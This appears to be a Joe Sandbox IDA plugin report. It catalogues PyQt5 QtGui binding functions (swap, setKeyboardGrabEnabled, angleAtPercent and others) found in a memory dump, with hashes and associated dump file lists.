Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?swap@Region@@V1@@
String ID: BJ9$QPainterPath$swap$swap(self, other: QPainterPath)
API String ID: 2712419754-3530485660
Opcode ID: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
Instruction ID: 318a92e8ad734b8e8a01f3382b566c17e2f537a789c89bbfdb4b9dac62f7274b
Opcode Fuzzy Hash: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
Instruction Fuzzy Hash: D51130B5A18F46C1EB10DF24E8886A933B8FB58B84F914076CA5D03320CF3DD559C740

Function 00007FFB9A34BBA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?swap@QTextFormat@@QEAAXAEAV1@@Z.QT5GUI ref: 00007FFB9A34BBFC

Strings

BJ9, xrefs: 00007FFB9A34BBCE
swap(self, other: QTextFormat), xrefs: 00007FFB9A34BC1F
QTextFormat, xrefs: 00007FFB9A34BC32
swap, xrefs: 00007FFB9A34BC2B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?swap@Format@@TextV1@@
String ID: BJ9$QTextFormat$swap$swap(self, other: QTextFormat)
API String ID: 986106111-4037277294
Opcode ID: 309df2eaffc27fcca22f97f0b50616adb5cd90d82e0c719c8d2f38cbba496cf6
Instruction ID: d9900f9304c6dac8e9f009b53c7a51cb4ea75f563dcfaf4c95d7516489f867f7
Opcode Fuzzy Hash: 309df2eaffc27fcca22f97f0b50616adb5cd90d82e0c719c8d2f38cbba496cf6
Instruction Fuzzy Hash: 4E1118B5A18E46C1EB10DF25E8882A933A8FB48B84F9140B2CA5D03320DF3DD55AC740

Function 00007FFB9A333C70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?swap@QTextFormat@@QEAAXAEAV1@@Z.QT5GUI ref: 00007FFB9A333CCC

Strings

BJ9, xrefs: 00007FFB9A333C9E
swap(self, other: QPalette), xrefs: 00007FFB9A333CEF
QPalette, xrefs: 00007FFB9A333D02
swap, xrefs: 00007FFB9A333CFB

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?swap@Format@@TextV1@@
String ID: BJ9$QPalette$swap$swap(self, other: QPalette)
API String ID: 986106111-1983445832
Opcode ID: 0aadf9379e76228c1e05613afac1d4e8ebb7325c66e00ae7799a6518653daf71
Instruction ID: f4aec1dbada79d148b9983a7d0f514b9aa776b7a55b51bae414e21b597b62fab
Opcode Fuzzy Hash: 0aadf9379e76228c1e05613afac1d4e8ebb7325c66e00ae7799a6518653daf71
Instruction Fuzzy Hash: D011FAB5A18F46C1EB10DF25E8886A933B8FB89B84FA140B6CA5D03320DF7DD55AC740

Function 00007FFB9A331980 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

?swap@QRegion@@QEAAXAEAV1@@Z.QT5GUI ref: 00007FFB9A3319DC

Strings

BJ9, xrefs: 00007FFB9A3319AE
swap(self, other: QRawFont), xrefs: 00007FFB9A3319FF
QRawFont, xrefs: 00007FFB9A331A12
swap, xrefs: 00007FFB9A331A0B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?swap@Region@@V1@@
String ID: BJ9$QRawFont$swap$swap(self, other: QRawFont)
API String ID: 2712419754-2130710366
Opcode ID: 8979dcb898a7b2ae65847d493f0592479a1a7b820e8141cfb89827695325043b
Instruction ID: 608a213b909f6d65da252285bb769d8af4c5708a43dfc7b970950b1360d7f24f
Opcode Fuzzy Hash: 8979dcb898a7b2ae65847d493f0592479a1a7b820e8141cfb89827695325043b
Instruction Fuzzy Hash: 511118B5A18F46C1EB10DF24E8886A933A8FB48B84F9141B2CA5D03320DF3DD959C740

Function 00007FFB9A309EB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?setKeyboardGrabEnabled@QWindow@@QEAA_N_N@Z.QT5GUI ref: 00007FFB9A309F08
PyBool_FromLong.PYTHON3 ref: 00007FFB9A309F11

Strings

QWindow, xrefs: 00007FFB9A309F36
setKeyboardGrabEnabled, xrefs: 00007FFB9A309F2F
setKeyboardGrabEnabled(self, grab: bool) -> bool, xrefs: 00007FFB9A309F23

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setBool_Enabled@FromGrabKeyboardLongWindow@@
String ID: QWindow$setKeyboardGrabEnabled$setKeyboardGrabEnabled(self, grab: bool) -> bool
API String ID: 1802758380-1671088457
Opcode ID: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
Instruction ID: 31719fbdf6f4ac14485b12da7de93cabbdbafe9bbae0652e3560258fe87c63a9
Opcode Fuzzy Hash: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
Instruction Fuzzy Hash: B5114CB5A18E56D1EB10DF34E8886A837B9FB45B45FA140B6CA9D03320DF3DD94AC700

Function 00007FFB9A2F3950 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?isValidCursorPosition@QTextLayout@@QEBA_NH@Z.QT5GUI ref: 00007FFB9A2F39A7
PyBool_FromLong.PYTHON3 ref: 00007FFB9A2F39B0

Strings

isValidCursorPosition, xrefs: 00007FFB9A2F39CE
QTextLayout, xrefs: 00007FFB9A2F39D5
isValidCursorPosition(self, pos: int) -> bool, xrefs: 00007FFB9A2F39C2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_CursorFromLayout@@LongPosition@TextValid
String ID: QTextLayout$isValidCursorPosition$isValidCursorPosition(self, pos: int) -> bool
API String ID: 2290150148-3369415377
Opcode ID: 3e011c9a74787a2205623a2db3002ffedc5a63a971083a772c786d9ef84aa39a
Instruction ID: 6f8e96f8d106ec6caef1b723ff9d0790f64f9bf2eac409810541b3703067c681
Opcode Fuzzy Hash: 3e011c9a74787a2205623a2db3002ffedc5a63a971083a772c786d9ef84aa39a
Instruction Fuzzy Hash: F00129B5A18E56D1EB10DF21E8886A933A9FB44B44FA14172CA5C43320CF3DD95AC740

Function 00007FFB9A34B8D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?angleAtPercent@QPainterPath@@QEBANN@Z.QT5GUI ref: 00007FFB9A34B929
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A34B92F

Strings

angleAtPercent(self, t: float) -> float, xrefs: 00007FFB9A34B941
QPainterPath, xrefs: 00007FFB9A34B954
angleAtPercent, xrefs: 00007FFB9A34B94D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?angleDoubleFloat_FromPainterPath@@Percent@
String ID: QPainterPath$angleAtPercent$angleAtPercent(self, t: float) -> float
API String ID: 204213175-2269684387
Opcode ID: 8adbd1c432bc2626309877ce92734a9291468099230f2ccade5138f8b2e45e72
Instruction ID: 7697462798ec1eb88df1b976785e13fb936c7a8938d220bb6b28a15bf9fb2c31
Opcode Fuzzy Hash: 8adbd1c432bc2626309877ce92734a9291468099230f2ccade5138f8b2e45e72
Instruction Fuzzy Hash: A30140B1A18E46C2EB11DF30E8886A933B8FB54B44FA14076CA5C43320DF3DD98AC740

Function 00007FFB9A34BA00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?slopeAtPercent@QPainterPath@@QEBANN@Z.QT5GUI ref: 00007FFB9A34BA59
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A34BA5F

Strings

slopeAtPercent, xrefs: 00007FFB9A34BA7D
QPainterPath, xrefs: 00007FFB9A34BA84
slopeAtPercent(self, t: float) -> float, xrefs: 00007FFB9A34BA71

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?slopeDoubleFloat_FromPainterPath@@Percent@
String ID: QPainterPath$slopeAtPercent$slopeAtPercent(self, t: float) -> float
API String ID: 1007492032-3960587637
Opcode ID: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
Instruction ID: 87ef59076abd2ece34d7f6495effaff5fff704897cf83bff998f2e36dad106eb
Opcode Fuzzy Hash: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
Instruction Fuzzy Hash: 070129B6A18E46C5EB11DF30E8886A933A8FB54B54FA140B6CA5C43320DF7DD99AC740

Function 00007FFB9A317AB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?intProperty@QTextFormat@@QEBAHH@Z.QT5GUI ref: 00007FFB9A317B00
PyLong_FromLong.PYTHON3 ref: 00007FFB9A317B08

Strings

QTextImageFormat, xrefs: 00007FFB9A317B2D
quality, xrefs: 00007FFB9A317B26
quality(self) -> int, xrefs: 00007FFB9A317B1A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?intFormat@@FromLongLong_Property@Text
String ID: QTextImageFormat$quality$quality(self) -> int
API String ID: 1809571791-639887700
Opcode ID: 83b7c6af291b6bec72a0417fd8d950562b69cffc2d440985d49a830bd2f046be
Instruction ID: 5598ce1fee4a568b96a35f6b06db1d927d9602b65dcd372f5ba2e734e645fc8a
Opcode Fuzzy Hash: 83b7c6af291b6bec72a0417fd8d950562b69cffc2d440985d49a830bd2f046be
Instruction Fuzzy Hash: 8A011AB5B08B4AC1EB108F71E8886A937A8FB94784F9180B2CE4D43320DF7DD559C780

Function 00007FFB9A301B70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?minimumSize@QWindow@@QEBA?AVQSize@@XZ.QT5GUI ref: 00007FFB9A301BC0
PyLong_FromLong.PYTHON3 ref: 00007FFB9A301BC8

Strings

QWindow, xrefs: 00007FFB9A301BED
minimumWidth(self) -> int, xrefs: 00007FFB9A301BDA
minimumWidth, xrefs: 00007FFB9A301BE6

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
